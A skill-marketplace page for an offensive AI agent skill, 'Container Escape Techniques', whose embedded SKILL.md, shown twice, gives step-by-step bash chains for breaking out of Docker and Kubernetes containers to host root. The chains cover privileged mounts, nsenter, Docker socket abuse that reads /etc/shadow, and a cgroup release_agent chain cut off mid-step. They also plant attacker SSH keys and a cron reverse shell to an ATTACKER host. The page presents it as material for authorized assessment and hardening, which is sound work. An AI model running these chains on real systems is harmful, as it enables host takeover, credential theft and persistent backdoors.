Container Escape Techniques

Name: Container Escape Techniques
Author: yaklang

yaklang/hack-skills

Study authorized container and Kubernetes escape chains to harden deployments and validate misconfiguration risks.

Overview

Container Escape Techniques is an agent skill for the Ship phase that documents Docker and Kubernetes container-to-host escape chains for authorized security assessment.

Install

npx skills add https://github.com/yaklang/hack-skills --skill container-escape-techniques

What is this skill?

Step-by-step privileged-container chains: CapEff check, host disk mount, chroot, and nsenter variants
Docker socket abuse sequences when the CLI or API is reachable from the container
Kubernetes-specific escape paths layered on top of base SKILL.md fundamentals
Explicit multi-step bash recipes with expected indicators (e.g. CapEff bitmask patterns)
Companion to main container-escape SKILL.md—load this file for chained scenarios

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).

What problem does it solve?

You run containers or clusters but cannot trace how common misconfigurations become full host compromise in practice.

Who is it for?

Builders and small teams doing authorized pentests, CTF labs, or security reviews of their own container/K8s stacks.

Skip if: Unauthorized testing on third-party systems, or teams seeking a benign CI/CD or observability integration skill.

When should I use this skill?

Load after main container-escape SKILL.md when you need chained Docker/Kubernetes escape scenarios for assessment or hardening drills.

What do I get? / Deliverables

You get repeatable escape chain playbooks you can map to hardening checks, test plans, and remediation priorities in staging or red-team engagements.

Documented escape chain steps
Verification commands and indicators
Hardening checklist mapping from chains

Recommended Skills

Azure Compliancemicrosoft/azure-skills

Azure Compliance is a Microsoft agent skill for solo builders and small teams who need structured security and complianc…373k installs·1.2k stars

Openclaw Secure Linux Cloudxixu-me/skills

OpenClaw Secure Linux Cloud guides a hardened VPS deployment—rootless Podman, loopback-only gateway, SSH-tunneled Contro…201k installs·61 stars

Entra Agent Idmicrosoft/azure-skills

entra-agent-id is a Microsoft-authored agent skill for provisioning and operating OAuth-capable identities tailored to A…99.1k installs·1.2k stars

Firebase Security Rules Auditorfirebase/agent-skills

Firebase Security Rules Auditor turns your agent into a senior penetration-style reviewer for Firestore rulesets. Solo b…40.3k installs·345 stars

Firestore Security Rules Auditorfirebase/agent-skills

Firestore-security-rules-auditor is a checker skill for solo builders and small teams shipping Firebase-backed apps who …20.3k installs·345 stars

Skill Vetteruseai-pro/openclaw-skills-security

Skill Vetter is a security-first OpenClaw agent skill that makes your coding agent behave like a pre-install auditor for…19.2k installs·62 stars

Journey fit

Primary fit

Escape paths matter during Ship when you test and lock down runtime posture before production exposure. Security is the shelf for offensive escape sequences used in assessment and defensive mapping, not routine feature build.

How it compares

Offensive escape chain reference for defenders—not a DevOps deploy or monitoring skill.

Common Questions / FAQ

Who is container-escape-techniques for?

Security-minded solo builders and infra owners who need explicit escape sequences to validate caps, mounts, sockets, and namespace settings on systems they are allowed to test.

When should I use container-escape-techniques?

During Ship security reviews before launch, when auditing privileged pods, exposed docker.sock, or shared PID namespaces, or when extending red-team exercises after loading the parent SKILL.md.

Is container-escape-techniques safe to install?

The skill encodes hostile techniques; only use on owned or contracted environments. Review the Security Audits panel on this Prism page and enforce legal authorization before any execution.

SKILL.md

READMESKILL.md - Container Escape Techniques

# Docker Escape Chains & Kubernetes Escape Paths

> **AI LOAD INSTRUCTION**: Load this for step-by-step container escape chains covering common misconfigurations, Docker-in-Docker scenarios, and Kubernetes-specific escape sequences. Assumes the main [SKILL.md](./SKILL.md) is already loaded for fundamental escape techniques.

---

## 1. ESCAPE CHAIN: PRIVILEGED CONTAINER → HOST ROOT

### 1.1 Full Chain (Mount + Chroot)

```bash
# Step 1: Confirm privileged mode
cat /proc/self/status | grep CapEff
# Expected: 0000003fffffffff (or 000001ffffffffff on newer kernels)

# Step 2: Identify host disk
fdisk -l 2>/dev/null
# /dev/sda1 (typical VM) or /dev/nvme0n1p1 (cloud)

# Step 3: Mount host root
mkdir -p /mnt/hostroot
mount /dev/sda1 /mnt/hostroot

# Step 4: Chroot to host
chroot /mnt/hostroot bash

# Step 5: Persistence — add SSH key
mkdir -p /root/.ssh
echo "ssh-rsa AAAA... attacker@box" >> /root/.ssh/authorized_keys

# Step 6: Clean up (optional — remove chroot artifacts)
exit
umount /mnt/hostroot
```

### 1.2 Full Chain (nsenter — Cleaner)

```bash
# Step 1: Confirm privileged + host PID visibility
ls /proc/1/root/etc/hostname
# If readable → host PID namespace is shared or we're privileged

# Step 2: nsenter into all host namespaces
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

# Step 3: Now running in host context
whoami    # root
hostname  # host hostname
```

---

## 2. ESCAPE CHAIN: DOCKER SOCKET → HOST ROOT

### 2.1 With Docker CLI Available

```bash
# Step 1: Confirm socket access
ls -la /var/run/docker.sock
docker ps    # list running containers

# Step 2: Launch privileged escape container
docker run -d --privileged --pid=host \
  -v /:/hostfs \
  --name escape alpine sleep 3600

# Step 3: Exec into escape container
docker exec -it escape chroot /hostfs bash

# Step 4: Persistence
echo 'ssh-rsa AAAA...' >> /root/.ssh/authorized_keys
# Or add cron backdoor:
echo '* * * * * root bash -i >& /dev/tcp/ATTACKER/4444 0>&1' >> /etc/crontab

# Step 5: Cleanup
exit
docker rm -f escape
```

### 2.2 Without Docker CLI (curl Only)

```bash
# Step 1: List images available on host
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json \
  | python3 -c "import sys,json; [print(i['RepoTags']) for i in json.load(sys.stdin)]"

# Step 2: Create container
CONTAINER_ID=$(curl -s --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/create \
  -H "Content-Type: application/json" \
  -d '{"Image":"alpine","Cmd":["/bin/sh"],"Tty":true,"OpenStdin":true,
       "HostConfig":{"Binds":["/:/host"],"Privileged":true}}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['Id'])")

# Step 3: Start container
curl -s --unix-socket /var/run/docker.sock \
  -X POST "http://localhost/containers/${CONTAINER_ID}/start"

# Step 4: Exec command (read host shadow)
EXEC_ID=$(curl -s --unix-socket /var/run/docker.sock \
  -X POST "http://localhost/containers/${CONTAINER_ID}/exec" \
  -H "Content-Type: application/json" \
  -d '{"Cmd":["cat","/host/etc/shadow"],"AttachStdout":true}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['Id'])")

curl -s --unix-socket /var/run/docker.sock \
  -X POST "http://localhost/exec/${EXEC_ID}/start" \
  -H "Content-Type: application/json" \
  -d '{"Tty":true}'

# Step 5: Cleanup
curl -s --unix-socket /var/run/docker.sock \
  -X DELETE "http://localhost/containers/${CONTAINER_ID}?force=true"
```

---

## 3. ESCAPE CHAIN: CGROUP RELEASE_AGENT → HOST COMMAND EXECUTION

```bash
# Step 1: Confirm cgroup v1 + CAP_SYS_ADMIN
mount | grep cgroup
# Look for "cgroup" (not "cgroup2")
grep CapEff /proc/self/status
# Need at minimum CAP_SYS_ADMIN

# Step 2: Find writable cgroup mount
d=$(dirname $(ls -x /s*/fs/c*/*/r* 2>/dev/null | head -n1))
[ -z "$d" ] && echo "No writable cgroup found" && exit 1

# Step 3: Create a child cgroup
mkdir -p "$d/escape"

# Step 4: Enable release notification
echo 1 > "$d/escape/notify_on_release"

# Step 5: Set release_agent to our sc

What is this skill?

Step-by-step privileged-container chains: CapEff check, host disk mount, chroot, and nsenter variants

Docker socket abuse sequences when the CLI or API is reachable from the container

Kubernetes-specific escape paths layered on top of base SKILL.md fundamentals

Explicit multi-step bash recipes with expected indicators (e.g. CapEff bitmask patterns)

Companion to main container-escape SKILL.md—load this file for chained scenarios

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 0/3 security scanners passed (skills.sh audits).

SKILL.md

READMESKILL.md - Container Escape Techniques

# Docker Escape Chains & Kubernetes Escape Paths

> **AI LOAD INSTRUCTION**: Load this for step-by-step container escape chains covering common misconfigurations, Docker-in-Docker scenarios, and Kubernetes-specific escape sequences. Assumes the main [SKILL.md](./SKILL.md) is already loaded for fundamental escape techniques.

---

## 1. ESCAPE CHAIN: PRIVILEGED CONTAINER → HOST ROOT

### 1.1 Full Chain (Mount + Chroot)

```bash
# Step 1: Confirm privileged mode
cat /proc/self/status | grep CapEff
# Expected: 0000003fffffffff (or 000001ffffffffff on newer kernels)

# Step 2: Identify host disk
fdisk -l 2>/dev/null
# /dev/sda1 (typical VM) or /dev/nvme0n1p1 (cloud)

# Step 3: Mount host root
mkdir -p /mnt/hostroot
mount /dev/sda1 /mnt/hostroot

# Step 4: Chroot to host
chroot /mnt/hostroot bash

# Step 5: Persistence — add SSH key
mkdir -p /root/.ssh
echo "ssh-rsa AAAA... attacker@box" >> /root/.ssh/authorized_keys

# Step 6: Clean up (optional — remove chroot artifacts)
exit
umount /mnt/hostroot
```

### 1.2 Full Chain (nsenter — Cleaner)

```bash
# Step 1: Confirm privileged + host PID visibility
ls /proc/1/root/etc/hostname
# If readable → host PID namespace is shared or we're privileged

# Step 2: nsenter into all host namespaces
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

# Step 3: Now running in host context
whoami    # root
hostname  # host hostname
```

---

## 2. ESCAPE CHAIN: DOCKER SOCKET → HOST ROOT

### 2.1 With Docker CLI Available

```bash
# Step 1: Confirm socket access
ls -la /var/run/docker.sock
docker ps    # list running containers

# Step 2: Launch privileged escape container
docker run -d --privileged --pid=host \
  -v /:/hostfs \
  --name escape alpine sleep 3600

# Step 3: Exec into escape container
docker exec -it escape chroot /hostfs bash

# Step 4: Persistence
echo 'ssh-rsa AAAA...' >> /root/.ssh/authorized_keys
# Or add cron backdoor:
echo '* * * * * root bash -i >& /dev/tcp/ATTACKER/4444 0>&1' >> /etc/crontab

# Step 5: Cleanup
exit
docker rm -f escape
```

### 2.2 Without Docker CLI (curl Only)

```bash
# Step 1: List images available on host
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json \
  | python3 -c "import sys,json; [print(i['RepoTags']) for i in json.load(sys.stdin)]"

# Step 2: Create container
CONTAINER_ID=$(curl -s --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/create \
  -H "Content-Type: application/json" \
  -d '{"Image":"alpine","Cmd":["/bin/sh"],"Tty":true,"OpenStdin":true,
       "HostConfig":{"Binds":["/:/host"],"Privileged":true}}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['Id'])")

# Step 3: Start container
curl -s --unix-socket /var/run/docker.sock \
  -X POST "http://localhost/containers/${CONTAINER_ID}/start"

# Step 4: Exec command (read host shadow)
EXEC_ID=$(curl -s --unix-socket /var/run/docker.sock \
  -X POST "http://localhost/containers/${CONTAINER_ID}/exec" \
  -H "Content-Type: application/json" \
  -d '{"Cmd":["cat","/host/etc/shadow"],"AttachStdout":true}' \
  | python3 -c "import sys,json; print(json.load(sys.stdin)['Id'])")

curl -s --unix-socket /var/run/docker.sock \
  -X POST "http://localhost/exec/${EXEC_ID}/start" \
  -H "Content-Type: application/json" \
  -d '{"Tty":true}'

# Step 5: Cleanup
curl -s --unix-socket /var/run/docker.sock \
  -X DELETE "http://localhost/containers/${CONTAINER_ID}?force=true"
```

---

## 3. ESCAPE CHAIN: CGROUP RELEASE_AGENT → HOST COMMAND EXECUTION

```bash
# Step 1: Confirm cgroup v1 + CAP_SYS_ADMIN
mount | grep cgroup
# Look for "cgroup" (not "cgroup2")
grep CapEff /proc/self/status
# Need at minimum CAP_SYS_ADMIN

# Step 2: Find writable cgroup mount
d=$(dirname $(ls -x /s*/fs/c*/*/r* 2>/dev/null | head -n1))
[ -z "$d" ] && echo "No writable cgroup found" && exit 1

# Step 3: Create a child cgroup
mkdir -p "$d/escape"

# Step 4: Enable release notification
echo 1 > "$d/escape/notify_on_release"

# Step 5: Set release_agent to our sc

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is container-escape-techniques for?

When should I use container-escape-techniques?

Is container-escape-techniques safe to install?

SKILL.md

This week for builders

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is container-escape-techniques for?

When should I use container-escape-techniques?

Is container-escape-techniques safe to install?

SKILL.md